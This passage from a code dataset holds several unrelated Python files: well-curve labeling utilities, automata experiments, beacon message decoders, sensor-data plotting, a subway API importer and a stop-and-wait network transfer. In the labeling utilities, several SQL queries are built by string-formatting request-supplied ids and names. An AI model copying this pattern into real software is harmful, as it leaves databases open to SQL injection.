query_set.append(well_dict)\n else:\n query_set = query_set\n\n return query_set\n\n\ndef tag_get_0(group_id, query_set, Tfilepath):\n \"\"\"标签页get请求\"\"\"\n # 处理过滤的翻页\n prev_image = query_set.filter(id__lt=group_id.id).first()\n next_image = query_set.filter(id__gt=group_id.id).last()\n # 翻页的id\n prev_image_id = prev_image.id if prev_image else None\n next_image_id = next_image.id if next_image else None\n\n data_tag, img_path = helper.insert_tag(group_id.id)\n data_tag.save()\n savepath = helper.original_data(group_id.id, Tfilepath)\n\n return prev_image_id, next_image_id, savepath, data_tag, img_path\n\n\ndef judge_period(wellname):\n \"\"\"判断井号是否存在周期\"\"\"\n well_list = helper.read_csv()\n\n if wellname in well_list:\n return True\n else:\n return False\n\n\ndef ori_data(request, id, Tfilepath):\n \"\"\"获取曲线原始数据\"\"\"\n # 查询对应曲线id数据\n orcl_cursor.execute('SELECT * FROM SKYCLOUD.DC_WELLCURVE WHERE ID=%s' % id)\n row = orcl_cursor.fetchone()\n if row:\n # 查询曲线对应的井名\n cursor.execute('SELECT WELLNAME FROM WELLNAME WHERE WELLID=%s GROUP BY WELLID' % row[1])\n wellname = cursor.fetchone()[0]\n else:\n wellname = ''\n\n # 查询单条曲线的9条数据\n orcl_cursor.execute('SELECT BSID, POINTVALUES FROM SKYCLOUD.DC_WELLCURVEITEM WHERE CURVEID=%s' % id)\n ori_data = orcl_cursor.fetchall()\n\n new_ori_data = []\n for data in ori_data:\n dict = {}\n dict['WELLNAME'] = wellname\n # 将datetime.datetime类型时间转换成时间字符串\n createdate = row[4].strftime(\"%Y-%m-%d %H:%M:%S\")\n dict['CREATEDATE'] = createdate\n dict['BSID'] = data[0]\n dict['POINTVALUES'] = data[1]\n new_ori_data.append(dict)\n ori_df = pd.DataFrame(new_ori_data)\n # 判断Tfile.csv中是否包含该井号和周期\n if judge_period(wellname) is False:\n savepath = None\n messages.success(request, \"此井号没有进行曲线周期预测!\")\n else:\n savepath = img_save.download_plot(ori_df, Tfilepath)\n\n \"\"\"获取电功图绝对路径\"\"\"\n tag_data = new_ori_data[0]\n createdate = tag_data['CREATEDATE']\n img_path = 'IMGdata/' + wellname + '_' + '_'.join([i for i in createdate.split(':')]) + '.jpg'\n\n tag_data['wellname'] = wellname\n tag_data['createdate'] = tag_data['CREATEDATE']\n # 判断电功图是否存在\n if os.path.exists(str(savepath)):\n tag_data['normalized_epd'] = os.path.join(settings.STATICFILES_DIRS[0], img_path)\n else:\n tag_data['normalized_epd'] = ''\n tag_data['labeled'] = False\n\n return savepath, tag_data, img_path\n\n\ndef tag_get_id(id):\n # 查询上一条曲线的曲线ID\n orcl_cursor.execute(\n \"SELECT ID FROM (SELECT ID FROM SKYCLOUD.DC_WELLCURVE WHERE ID<%s ORDER BY ID DESC) WHERE ROWNUM=1\" % id)\n prev_image = orcl_cursor.fetchone()\n # 查询下一条曲线的曲线ID\n orcl_cursor.execute(\n \"SELECT ID FROM (SELECT ID FROM SKYCLOUD.DC_WELLCURVE WHERE ID>%s ORDER BY ID) WHERE ROWNUM=1\" % id)\n next_image = orcl_cursor.fetchone()\n\n # 翻页的id\n prev_image_id = prev_image[0] if prev_image else None\n next_image_id = next_image[0] if next_image else None\n\n return prev_image_id, next_image_id\n\n\ndef tag_get_1(request, id, Tfilepath):\n \"\"\"标签数据存大表\"\"\"\n savepath, tag_data, img_path = ori_data(request, id, Tfilepath)\n\n # 数据库去重\n cursor.execute(\n \"SELECT * FROM electric_tag WHERE (wellname='%s' AND createdate='%s')\"\n % (tag_data['wellname'], tag_data['createdate']))\n rows = cursor.fetchall()\n if not rows:\n # 入库时间\n current_time = datetime.datetime.now()\n # current_time = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))\n # 大表数据插入\n sql = \"INSERT INTO electric_tag(id, wellname, createdate, original_data, original_epd, electric_pcd, \" \\\n \"normalized_epd, wellbore_tag_1, wellbore_tag_2, slowdown_box_tag, motor_belt_tag, balance_tag, \" \\\n \"remarks,path_id,labeled, create_time) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n\n # 本次入库数据\n values = (id, tag_data['wellname'], tag_data['createdate'], '', '', '', tag_data['normalized_epd'], '', '', '',\n '', '', '', 0, tag_data['labeled'], current_time)\n\n cursor.execute(sql, values)\n connection.commit()\n else:\n row = rows[0]\n # 获取已经存在曲线的曲线标签数据\n tag_data['wellbore_tag_1'] = row[7]\n tag_data['wellbore_tag_2'] = row[8]\n tag_data['slowdown_box_tag'] = row[9]\n tag_data['motor_belt_tag'] = row[10]\n tag_data['balance_tag'] = row[11]\n tag_data['remarks'] = row[12]\n tag_data['labeled'] = row[14]\n\n return savepath, tag_data, img_path\n\n\ndef tag_update(id):\n \"\"\"更新标签数据\"\"\"\n # 查询需要更新曲线\n orcl_cursor.execute('SELECT * FROM SKYCLOUD.DC_WELLCURVE WHERE ID=%s' % id)\n row = orcl_cursor.fetchone()\n if row:\n createdate = row[4].strftime(\"%Y-%m-%d %H:%M:%S\")\n # 查询更新曲线的井名\n cursor.execute('SELECT WELLNAME FROM WELLNAME WHERE WELLID=\"%s\"' % row[1])\n wellname = cursor.fetchone()[0]\n else:\n wellname = None\n createdate = None\n\n return wellname, createdate\n\n\ndef form_post(form):\n \"\"\"获取post请求数据\"\"\"\n if form.is_valid():\n wellbore_tag_1 = form.cleaned_data.get('wellbore_tag_1')\n wellbore_tag_2 = form.cleaned_data.get('wellbore_tag_2')\n motor_belt_tag = form.cleaned_data.get('motor_belt_tag')\n balance_tag = form.cleaned_data.get('balance_tag')\n slowdown_box_tag = form.cleaned_data.get('slowdown_box_tag')\n remarks = form.cleaned_data.get('remarks')\n else:\n wellbore_tag_1 = ''\n wellbore_tag_2 = ''\n motor_belt_tag = ''\n balance_tag = ''\n slowdown_box_tag = ''\n remarks = ''\n\n return wellbore_tag_1, wellbore_tag_2, motor_belt_tag, balance_tag, slowdown_box_tag, remarks\n\n","sub_path":"power_label/apps/label/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"83856643","text":"from DAWG import contruir_dawg, contruir_dawg_arquivo, testar_dawg_arquivo, testar_dawg_arquivo_convertendo_AFD\nfrom utils import open_automaton, convert_afn_to_afd\nimport AFN\nimport AFD\n\nafd_1 = open_automaton('afd_1.json')\ncheck = AFD.testar_string(afd_1, '0110')\nprint(check)\n\nafn_1 = open_automaton('afn_1.json')\ncheck = AFN.testar_string(afn_1, '0110')\nprint(check)\n\nafn_2 = open_automaton('afn_2.json')\nafd = convert_afn_to_afd(afn_2)\nprint(afd)\n\nafn_3 = open_automaton('afn_3.json')\nafd = convert_afn_to_afd(afn_3)\nprint(afd)\n\nafn_4 = open_automaton('afn_4.json')\nafd = convert_afn_to_afd(afn_4)\nprint(afd)\n\n# =============== dawg videos===========\nSp = ['aba', 'baa', 'b']\nSm = ['a', 'bab', 'aaa']\n\nprint(contruir_dawg(Sp, Sm, ['a', 'b']))\n\n# ================= dawg arquivos\ndawg = contruir_dawg_arquivo('waltz.txt')\ntestar_dawg_arquivo(dawg, 'waltzdb.csv')\ntestar_dawg_arquivo_convertendo_AFD(dawg, 'waltzdb.csv')\n","sub_path":"experimentos.py","file_name":"experimentos.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"355488373","text":"#!/usr/bin/python\n# print(\"Content-Type: text/html\\n\")\n# print()\n# decode functions\n\n# -*- coding: utf-8 -*-\n\n\n# updated July 12, 2017\n\n\nBAUDOT = {\n \"111000\": \"A\",\n \"110011\": \"B\",\n \"101110\": \"C\",\n \"110010\": \"D\",\n \"110000\": \"E\",\n \"110110\": \"F\",\n \"101011\": \"G\",\n \"100101\": \"H\",\n \"101100\": \"I\",\n \"111010\": \"J\",\n \"111110\": \"K\",\n \"101001\": \"L\",\n \"100111\": \"M\",\n \"100110\": \"N\",\n \"100011\": \"O\",\n \"101101\": \"P\",\n \"111101\": \"Q\",\n \"101010\": \"R\",\n \"110100\": \"S\",\n \"100001\": \"T\",\n \"111100\": \"U\",\n \"101111\": \"V\",\n \"111001\": \"W\",\n \"110111\": \"X\",\n \"110101\": \"Y\",\n \"110001\": \"Z\",\n \"100100\": \" \",\n \"011000\": \"-\",\n \"010111\": \"/\",\n \"001101\": \"0\",\n \"011101\": \"1\",\n \"011001\": \"2\",\n \"010000\": \"3\",\n \"001010\": \"4\",\n \"000001\": \"5\",\n \"010101\": \"6\",\n \"011100\": \"7\",\n \"001100\": \"8\",\n \"000011\": \"9\",\n \"010110\": \"?\",\n \"000000\": \"?\",\n \"100000\": \"\",\n}\n\n\ndef calcbch(binary, gx, b1start, b1end, b2end):\n bchlist = list(binary[b1start:b1end] + \"0\" * (b2end - b1end))\n for i in range(b1end - b1start):\n if bchlist[i] == \"1\":\n for k in range(len(gx)):\n if bchlist[i + k] == gx[k]:\n bchlist[i + k] = \"0\"\n else:\n bchlist[i + k] = \"1\"\n return \"\".join(bchlist)[b1end - b2end :]\n\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n\ndef getFiveCharChecksum(bcnId):\n returnLimit = 1048576 # used to limit the return value to a 20 bit result\n runningSumLimit = 538471 # large prime which will not cause an overflow\n constPrimVal = 3911 # small prime value that stays constant throughout\n modifierLimit = 3847 # small prime which will not cause an overflow\n modifier = 3803 # modifier, simply initialized to a prime value\n runningSum = 0 # variable to hold the running value of the checksum\n tmpLongValue = 0 # holds temporary data\n decimalValue = 0 # holds decimal value for character\n ## Note: int data type is 4 bytes, largest positive value is 2,147,483,647 and\n ##\t all computations are designed to remain within this value (no overflows)\n i = 0\n for char in bcnId:\n decimalValue = int(ord(char))\n tmpLongValue = (runningSum * modifier) + decimalValue\n # on last character here use the higher resolution result as input to final truncation\n if i == len(bcnId) - 1:\n runningSum = tmpLongValue % returnLimit\n # print(runningSum)\n else:\n runningSum = tmpLongValue % runningSumLimit\n # print(tmpLongValue,runningSumLimit,runningSum)\n modifier = (constPrimVal * modifier) % modifierLimit\n i += 1\n return str(\n hex(runningSum)[2:].upper().zfill(5)\n ) #'Checksum: {} ({})'.format(hex(runningSum)[2:].upper().zfill(5),runningSum)\n\n\ndef dec2bin(n, ln=None):\n \"\"\"convert denary integer n to binary string bStr\"\"\"\n n = int(n)\n bStr = \"\"\n\n if n < 0:\n raise ValueError(\"must be a positive integer.\")\n # if n == 0: return '0'\n while n > 0:\n bStr = str(n % 2) + bStr\n n = n >> 1\n if not ln:\n l = len(bStr)\n else:\n l = ln\n b = \"0\" * (l - len(bStr)) + bStr\n return b\n\n\ndef is_neg(s):\n if s < 0:\n return -1\n else:\n return 1\n\n\ndef bin2dec(s):\n return int(s, 2)\n\n\ndef bin2hex2(binval):\n return str(hex(int(binval, 2)))[2:].upper().strip(\"L\")\n\n\ndef hextobin(hexval):\n \"\"\"\n Takes a string representation of hex data with\n arbitrary length and converts to string representation\n of binary. Includes padding 0s\n \"\"\"\n thelen = len(hexval) * 4\n hexval = str(hexval)\n\n try:\n binval = bin(int(hexval, 16))[2:]\n except ValueError:\n return False\n while (len(binval)) < thelen:\n binval = \"0\" + binval\n return binval\n\n\ndef baudot(binstr, startpos, endpos, short=False):\n if short:\n jump = 5\n one = \"1\"\n else:\n jump = 6\n one = \"\"\n # baudot string values are 6 bit length binary with following code reference\n baudot = BAUDOT\n baudstr = b = \"\"\n\n while startpos < endpos:\n\n try:\n b = baudot[one + binstr[startpos : startpos + jump]]\n\n except KeyError:\n b = \"?\"\n\n startpos += jump\n baudstr = baudstr + b\n return baudstr\n\n\ndef latlongresolution(binary, startpos, endpos):\n # PDF-2 from 20 or 14 bits starting from bit 113\n # Standard Location Procols are 20 bit length ( bits 113 to 132) with from 0-30 minutes resolution adjustment\n # and 0 to 60 secondsresolution in 4 second increments.\n # National Location Protocol are 14 bit length - Bits 113 to 126 express 0-3 minute resultions and 0-60 second,(4 sec) increments resolution.\n #\n\n l = endpos - startpos\n\n if binary[startpos] == \"0\": # 1 bit (113)\n signlat = -1\n latdir = \"negative\"\n else:\n signlat = 1\n latdir = \"positive\"\n\n if l == 20:\n # Standard Location Protocol is 20 bits of data.\n # Five bits for minutes of max 30 minute adjustment\n\n latminutes = float(bin2dec(binary[startpos + 1 : startpos + 6])) # 5 bits\n latseconds = float(\n bin2dec(binary[startpos + 6 : startpos + 10]) * 4\n ) # 4 bits\n longminutes = float(bin2dec(binary[startpos + 11 : startpos + 16])) # 5 bits\n longseconds = float(\n bin2dec(binary[startpos + 16 : startpos + 20]) * 4\n ) # 4 bits\n\n if binary[startpos + 10] == \"0\": # 1 bit\n signlong = -1\n lndir = \"negative\"\n else:\n signlong = 1\n lndir = \"positive\"\n\n elif l == 14:\n # National Location Protocol is 14 bits of data.\n # Only 2 bits for minutes of max 3 minute adjustment\n latminutes = float(bin2dec(binary[startpos + 1 : startpos + 3])) # 2 bits\n latseconds = float(bin2dec(binary[startpos + 3 : startpos + 7]) * 4) # 4 bits\n longminutes = float(bin2dec(binary[startpos + 8 : startpos + 10])) # 2 bits\n longseconds = float(\n bin2dec(binary[startpos + 10 : startpos + 14]) * 4\n ) # 4 bits\n if binary[startpos + 7] == \"0\": # 1 bit\n signlong = -1\n lndir = \"negative\"\n else:\n signlong = 1\n lndir = \"positive\"\n\n elif l == 18:\n # print 'rls',binary[startpos+14:startpos+20]\n # RLS or ELT-DT Location Protocol is 18 bits of data.\n # Only 4 bits for minutes of max 15 minute adjustment\n latminutes = float(bin2dec(binary[startpos + 1 : startpos + 5])) # 4 bits\n latseconds = float(bin2dec(binary[startpos + 5 : startpos + 9]) * 4) # 4 bits\n longminutes = float(bin2dec(binary[startpos + 10 : startpos + 14])) # 4 bits\n longseconds = float(\n bin2dec(binary[startpos + 14 : startpos + 18]) * 4\n ) # 4 bits\n if binary[startpos + 9] == \"0\": # 1 bit\n signlong = -1\n lndir = \"negative\"\n else:\n signlong = 1\n lndir = \"positive\"\n\n else:\n # Bad length. Length must be 14,18 or 20.\n return False\n\n if int(latminutes) > 30:\n longoffset = latoffset = \"Default - no location\"\n\n elif int(latseconds) == 60 and latdir == \"positive\":\n latoffset = longoffset = \"Default - no location\"\n\n else:\n latoffset = \"{} minutes {} seconds ({})\".format(latminutes, latseconds, latdir)\n longoffset = \"{} minutes {} seconds ({})\".format(\n longminutes, longseconds, lndir\n )\n return (\n signlat * (float(latminutes / 60) + float(latseconds / 3600)),\n signlong * (float(longminutes / 60) + float(longseconds / 3600)),\n latoffset,\n longoffset,\n )\n\n\ndef latitudeRLS(latsono, latdeg):\n if latsono == \"1\":\n latdir = \"South\"\n sg = -1\n else:\n latdir = \"North\"\n sg = 1\n deg = float(bin2dec(latdeg)) / float(2)\n decimal = sg * deg\n if deg > 90:\n if \"0\" not in latdeg:\n lat = decimal = \"Default - no location\"\n else:\n lat = decimal = \"Error >90 (Deg:{})\".format(decimal)\n else:\n lat = str(deg) + \" Degrees \" + latdir\n return (lat, decimal, latdir)\n\n\ndef longitudeRLS(longEW, longdeg):\n if longEW == \"0\":\n longdir = \"East\"\n sg = 1\n else:\n longdir = \"West\"\n sg = -1\n deg = float(bin2dec(longdeg)) / float(2)\n # print longdeg,bin2dec(longdeg)\n decimal = sg * deg\n if deg > 180:\n if \"0\" not in longdeg:\n longe = decimal = \"Default - no location\"\n else:\n longe = decimal = \"Error >180 (Deg:{})\".format(decimal)\n else:\n longe = str(deg) + \" Degrees \" + longdir\n return (longe, decimal, longdir)\n\n\ndef latitude(latsono, latdeg, latmin):\n n = 1\n if latsono == \"1\":\n latdir = \"South\"\n sg = -1\n else:\n latdir = \"North\"\n sg = 1\n\n if len(latmin) == 5:\n n = 2\n elif len(latmin) == 4:\n n = 4\n elif len(latmin) == 2:\n n = 15\n\n minutes = float(bin2dec(latmin) * n)\n deg = float(bin2dec(latdeg))\n decimal = sg * (float(deg) + float(minutes / 60))\n if deg > 90:\n if \"0\" not in latdeg:\n lat = decimal = \"Default - no location\"\n else:\n lat = decimal = \"Error >90 (Deg:{})\".format(decimal)\n\n else:\n\n lat = str(int(deg)) + \" Degrees \" + str(int(minutes)) + \" Minutes \" + latdir\n\n return (lat, decimal, latdir, minutes)\n\n\ndef bin2hex(binval):\n \"\"\"Convert binary to hexadecimal\n\n Args:\n binval (str): binary data in string format\n Returns:\n hex_str (str): hexadecimal string\"\"\"\n\n hex_str = \"{:0{}X}\".format(int(binval, 2), len(binval) // 4)\n\n return hex_str\n\n\ndef longitude(longeswe, longdeg, longmin):\n n = 1\n if longeswe == \"0\":\n lngdir = \"East\"\n sg = 1\n else:\n lngdir = \"West\"\n sg = -1\n\n if len(longmin) == 5:\n n = 2\n elif len(longmin) == 4:\n n = 4\n elif len(longmin) == 2:\n n = 15\n minutes = float(bin2dec(longmin) * n)\n deg = float(bin2dec(longdeg))\n decimal = sg * (float(deg) + float(minutes / 60))\n if deg > 180:\n if \"0\" not in longdeg:\n\n lng = decimal = \"Default - no location\"\n\n else:\n lng = decimal = \"Error! > 180 (Deg:{})\".format(decimal)\n\n else:\n\n lng = str(int(deg)) + \" Degrees \" + str(int(minutes)) + \" Minutes \" + lngdir\n\n # decimal=deg + float( minutes / 60 )\n\n return (lng, decimal, lngdir, minutes)\n\n\ndef latlongdir(direction):\n if direction in [\"South\", \"West\"]:\n return -1\n else:\n return 1\n\n\ndef samplehex():\n b = \"10001100110110010\"\n\n c = \"0000000110000010110000001000001111001011010011010000011011011110011011100011100000001111000101110110011\"\n return bin2hex(b + c), len(b + c)\n\n\n# print(hextobin('3DA6D7095BCAB000AB000ABE000000000004'))\n","sub_path":"my_packages/decodefunctions.py","file_name":"decodefunctions.py","file_ext":"py","file_size_in_byte":11090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"115865814","text":"\"\"\"\nThis script gets the xls files from my ply and plots them into a good looking graph\nby Sinai Sacharen\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport os\nfrom datetime import datetime\n\nplt.style.use('fivethirtyeight')\n\nfolder_path = 'C:/Users/User/Documents/school/project/' # must end with a /\nif os.path.exists(folder_path):\n print('found path')\nelse:\n print('cant find path')\n\nxls = pd.ExcelFile(folder_path + 'excel_2020-03-23_102407.xlsx')\ndf1 = pd.read_excel(xls, 'RO_Shafdan_1')\ndf2 = pd.read_excel(xls, 'RO_Shafdan_2')\n\n# clean df1\nhead_list = list(df1)\nfor col in head_list:\n if col not in ['Time', 'Pressure - Bar', 'Flow rate - gr/l']:\n df1.drop([col], axis=1, inplace=True)\n\ndf1.rename(columns={\"Pressure - Bar\": \"Pressure [bar]\", \"Flow rate - gr/l\": \"Flow rate [ml/hr]\"}, inplace=True)\n#df1['Time'] = df1['Time'].apply(lambda x: datetime.datetime.fromtimestamp(x))\n# calculating hour mean for flow and pressure\ndf1.set_index('Time',inplace=True,drop=True)\ndf1_mean = df1.resample('H').mean()\ndf1_mean.reset_index(inplace=True)\ndf1_mean['sys'] = df1_mean['Time'].apply(lambda x: 'sys_1')\ndf1 = df1_mean\ndf1.drop(df1[df1['Flow rate [ml/hr]'] >120].index, inplace=True)\n\n# clean df2\nhead_list = list(df2)\nfor col in head_list:\n if col not in ['Time', 'Pressure - Bar', 'Flow rate - gr/l']:\n df2.drop([col], axis=1, inplace=True)\ndf2.rename(columns={\"Pressure - Bar\": \"Pressure [bar]\", \"Flow rate - gr/l\": \"Flow rate [ml/hr]\"}, inplace=True)\ndf2.set_index('Time',inplace=True,drop=True)\ndf2_mean = df2.resample('H').mean()\ndf2_mean.reset_index(inplace=True)\ndf2_mean['sys'] = df2_mean['Time'].apply(lambda x: 'sys_2')\ndf2 = df2_mean\ndf2.drop(df2[df2['Flow rate [ml/hr]'] >120].index, inplace=True)\n\n\n# Plot the lines\nfig, ax1 = plt.subplots(figsize=(15,8))\n\nplt.title('sys_1 vs sys_2',fontsize=20)\nax1.set_xlabel('time', fontsize=16)\nax1.set_ylabel(\"Pressure [bar]\",fontsize=16)\nax1.plot(df1['Time'], df1[\"Pressure [bar]\"], c='brown',label= 'Pressure sys1')\nax1.plot(df2['Time'], df2[\"Pressure [bar]\"], color='red',label= 'Pressure sys2')\n\nax1.tick_params(axis='y')\n\nax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\n\n\nax2.set_ylabel('Flow rate [ml/hr]',fontsize=16) # we already handled the x-label with ax1\nax2.plot(df1['Time'], df1['Flow rate [ml/hr]'], color='teal',label= 'Flow sys1')\nax2.plot(df2['Time'], df2['Flow rate [ml/hr]'], color='blue',label= 'Flow sys2')\n\nax2.tick_params(axis='y')\n\nlines, labels = ax1.get_legend_handles_labels()\nlines2, labels2 = ax2.get_legend_handles_labels()\nax2.legend(lines + lines2, labels + labels2, loc='center left', bbox_to_anchor=(1.075, 0.5))\n\nax1.grid()\n\nfig.tight_layout() # otherwise the right y-label is slightly clipped\n# plt.show()\nplt.savefig(folder_path + 'sys_1 vs sys_2.jpg')\n\n# ploy every system by itself--------------------------------------------------------------\npieces = {'sys_1': df1, 'sys_2': df2}\n\ndf_piece = pd.concat(pieces, sort=False)\ndf_piece['Time'] = df_piece['Time'].values.astype(float)\n\nplt.subplots(figsize=(15,8))\nsns.lineplot(x=\"Time\", y=\"Flow rate [ml/hr]\",\n hue=\"sys\",\n data=df_piece)\nplt.title('Flow rate',fontsize=20)\nfig.tight_layout() # otherwise the right y-label is slightly clipped\nplt.savefig(folder_path + 'Flow rate.jpg')\n\nplt.subplots(figsize=(15,8))\nplt.style.use('ggplot')\nsns.lineplot(x=\"Time\", y=\"Pressure [bar]\",\n hue=\"sys\",\n data=df_piece)\nplt.title('Pressure',fontsize=20)\nfig.tight_layout() # otherwise the right y-label is slightly clipped\nplt.savefig(folder_path + 'Pressure.jpg')\n\n","sub_path":"project_ro.py","file_name":"project_ro.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"331305246","text":"__author__ = 'aj'\n# -*- coding: UTF-8 -*-\n\nfrom externapi.seoul.imports.import_base import *\nfrom externapi.seoul.SubwayOpenApi import *\nfrom externapi.seoul.DbSubwaySeoul import DbSeoulSubway\nimport unittest\n\n# 모든 라인의 지하철역 목록을 REST 요청하고, 해당결과를 DB 에 저장한다.\ndef importStart():\n\n dss = DbSeoulSubway()\n if dss.open_api_service_connection() is False:\n raise OpenServiceDataImporterException(\"Can't not Open Database Connection\")\n\n svc_nm = SB_SERVICE.SVC_SEARCHSTNBYSUBWAYLINESERVICE\n\n lines = SB_API_PARAM.LINE_NUM.list()\n for line in lines:\n req_loop = SB_API_RequestMaker.get_request_byservice(svc_nm)\n req_loop.START_INDEX = 0\n req_loop.END_INDEX = -1\n req_loop.LINE_NUM = line[K_KEY]\n\n _Save2Db(svc_nm, req_loop, dss)\n\n dss.close_api_service_connection(True)\n return True\n\n# 지하철라인별로 REST 서비스를 요청한다.\ndef _Save2Db(svc_nm, req_loop, dss):\n _REQ_DATA_SIZE = 1000\n while True :\n req_loop.START_INDEX = (req_loop.END_INDEX + 1)\n req_loop.END_INDEX = req_loop.START_INDEX + (_REQ_DATA_SIZE-1)\n\n resp = SbOpenApi.getServiceData(req_loop)\n totalcnt = resp.list_total_count\n if resp.row.__len__() == 0:\n return\n\n # Save to Database\n dss.import_api_service_data(svc_nm, resp.row)\n\n # Last phase\n if req_loop.END_INDEX+1 >= totalcnt:\n return\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"externapi/seoul/imports/import_SeachStationBySubwayLineService.py","file_name":"import_SeachStationBySubwayLineService.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"617819960","text":"import json\nimport os\nimport pickle\nfrom datetime import datetime\n\n\ndef main_timer(func):\n def function_wrapper():\n start_time = datetime.now()\n print(f'Start Time: {start_time.strftime(\"%A %m/%d/%Y %H:%M:%S\")}')\n\n func()\n\n end_time = datetime.now()\n print(f'End Time: {end_time.strftime(\"%A %m/%d/%Y %H:%M:%S\")}')\n print(f'Total runtime: {end_time - start_time} (HH:MM:SS)')\n\n return function_wrapper\n\n\ndef load_pickle(file):\n \"\"\"Load the datum pickle and returns as a dataframe\n\n Args:\n file (string): labels pickle from 247-decoding/tfs_pickling.py\n\n Returns:\n DataFrame: pickle contents returned as dataframe\n \"\"\"\n with open(file, 'rb') as fh:\n datum = pickle.load(fh)\n\n return datum\n\n\ndef write_config(dictionary):\n \"\"\"Write configuration to a file\n Args:\n CONFIG (dict): configuration\n \"\"\"\n json_object = json.dumps(dictionary, sort_keys=True, indent=4)\n\n config_file = os.path.join(os.path.join(os.getcwd(), 'results'),\n 'config.json')\n with open(config_file, \"w\") as outfile:\n outfile.write(json_object)\n","sub_path":"code/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117436026","text":"\"\"\"\nWhere solution code to project should be written. No other files should\nbe modified.\n\"\"\"\n\nimport socket\nimport io\nimport time\nimport typing\nimport struct\nimport util\nimport util.logging\nimport threading\nfrom threading import Timer\nfrom queue import Queue \nimport errno\n\ndef send(sock: socket.socket, data: bytes):\n \"\"\"\n Implementation of the sending logic for sending data over a slow,\n lossy, constrained network.\n\n Args:\n sock -- A socket object, constructed and initialized to communicate\n over a simulated lossy network.\n data -- A bytes object, containing the data to send over the network.\n \"\"\"\n global pkt\n \n def setInterval(interval):\n def decorator(function):\n def wrapper(*args, **kwargs):\n stopped = threading.Event()\n\n def loop(): # executed in another thread\n while not stopped.wait(interval): # until stopped\n function(*args, **kwargs)\n\n t = threading.Thread(target=loop)\n t.daemon = True # stop if the program exits\n t.start()\n return stopped\n return wrapper\n return decorator\n\n \n wait = False\n\n @setInterval(4) ##15\n def function():\n nonlocal ack_recv\n nonlocal wait \n nonlocal rounds \n nonlocal seqNum\n nonlocal rounds \n \n if ((ackWait == 0 and ack_recv == 0) or rounds == 0): ##Packet not recieved, so Resend \n sock.send(pkt)\n logger.info(\"Packet not recieved...Resending Packet\")\n ##seqNum = seqNum - 1 \n elif(ack_recv == 1 ): ##Packet recieved so timer should not send another packet\n ##sock.send(ACK.to_bytes(1,'big'))\n logger.info(\"Packet recieved in correct order\")\n ack_recv = 0 \n return\n\n sock.setblocking(1)\n ##sock.settimeout(20)\n logger = util.logging.get_logger(\"project-sender\")\n seqNum = 0\n seqNumRecv = 0\n chunk_size = util.MAX_PACKET - 2 ##util.MAX_PACKET \n offsets = range(0, len(data), chunk_size) ##util.MAX_PACKET\n ACK = 1\n \n ackWait = 0 \n rounds = 0\n Ack_Expected = 0 \n\n for chunk in [data[i:i + chunk_size] for i in offsets]:\n\n seqNumSend = seqNum.to_bytes(1, 'big')\n pkt = bytearray(seqNumSend)\n pkt = pkt + chunk \n sock.send(pkt)\n ack_recv = 0 \n logger.info(\"Sending %s bytes\", len(pkt)) \n logger.info(\"Waiting for %d seconds for ACK or Timeout\", 6)\n\n while(ackWait == 0 ): ##Waiting for ACK state\n ##sock.send(pkt)\n ##print(\"ITS IN ACK WAITING MODE\") ##Debugging Purposes \n return_data = sock.recv(1)\n stop = function() ##Starting Sender Timer\n\n if (int.from_bytes(return_data,'big') == Ack_Expected ): ## if the packet is recieved correctly \n ack_recv = 1 \n logger.info(\"ACK recieved for packet %d\", seqNum)\n temp = Ack_Expected \n if(Ack_Expected == 0 ):\n Ack_Expected = 1 \n elif(Ack_Expected == 1 ):\n Ack_Expected = 0\n ackWait = 1\n\n if ( seqNum == 0 ): ##Adjusting Sequence numbers \n seqNum = 1 \n elif (seqNum == 1 ):\n seqNum = 0 \n ackWait = 0 \n ##print(\"\\n \\n \\n round: \", rounds) ##Debugging action\n ##rounds = rounds + 1 \n\n \ndef recv(sock: socket.socket, dest: io.BufferedIOBase) -> int:\n \"\"\"\n Implementation of the receiving logic for receiving data over a slow,\n lossy, constrained network.\n\n Args:\n sock -- A socket object, constructed and initialized to communicate\n over a simulated lossy network.\n\n Return:\n The number of bytes written to the destination.\n \"\"\"\n global ACK\n\n expectedSeqnum = 0\n\n logger = util.logging.get_logger(\"project-receiver\")\n num_bytes = 0 \n ##sock.settimeout(15)\n ##sock.setblocking(1)\n global ack_recv\n ack_recv = 0\n while True:\n try:\n data = sock.recv(util.MAX_PACKET) ##util.MAX_PACKET\n if not data:\n break \n except socket.error as e:\n err = e.args[0]\n if(err == errno.EAGAIN or err == errno.EWOULDBLOCK):\n time.sleep(1) \n ##print('No Data Avaiable') ##If first Packet is Dropped, Recv should catch the exception and continue listening for refire\n continue \n else: \n logger.info(\"recieved %d bytes\" , len(data))\n recvSeqnum = data[0]\n data = data[1:len(data)]\n logger.info(\"Recieved Sequence number %d expecting Sequence number %d \", recvSeqnum, expectedSeqnum)\n\n if(recvSeqnum == expectedSeqnum): ## Sending ACK for correctly Recieved packet from Sender\n ACK = recvSeqnum \n sock.send(ACK.to_bytes(1,'big'))\n logger.info(\"Sending ACK for packet %d\", recvSeqnum)\n if (expectedSeqnum == 0):\n expectedSeqnum = 1 \n elif (expectedSeqnum == 1 ):\n expectedSeqnum = 0 \n dest.write(data)\n\n elif(recvSeqnum != expectedSeqnum): ##Detect Duplicate for Lost ACK or Premature Timeout from Sender timer \n logger.info(\"Duplicated Detected...Not Writing to Data\")\n if (recvSeqnum != expectedSeqnum):\n expectedSeqnum = recvSeqnum\n 